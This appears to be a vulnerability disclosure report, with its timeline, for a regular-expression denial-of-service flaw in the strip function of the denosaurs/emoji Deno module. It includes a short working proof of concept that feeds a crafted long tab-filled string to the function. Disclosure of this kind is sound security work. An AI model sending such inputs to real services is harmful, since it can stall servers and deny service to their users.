ReDoS vulnerability in `strip` function in denosaurs/emoji
Valid
Reported on
Apr 15th 2023
Description
The reTrimSpace
regex has 2nd degree polynomial inefficiency, leading to a delayed response given a big payload.
Proof of Concept
import * as emoji from "https://deno.land/x/emoji@0.2.1/mod.ts";
const input = '\x00' + '\t'.repeat(154773) + '\t\x00';
const start = performance.now();
emoji.strip(input);
const end = performance.now();
console.log(Number(end - start).toString());
This usually takes ~12 seconds on a fast PC model.
Impact
Exploiting this vulnerability successfully can lead to staggered delays on a server.
References
We are processing your report and will contact the
denosaurs/emoji
team within 24 hours.
5 months ago
Tristan F. modified the report
5 months ago
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
5 months ago
We have contacted a member of the
denosaurs/emoji
team and are waiting to hear back
5 months ago
We have sent a
follow up to the
denosaurs/emoji
team.
We will try again in 7 days.
5 months ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation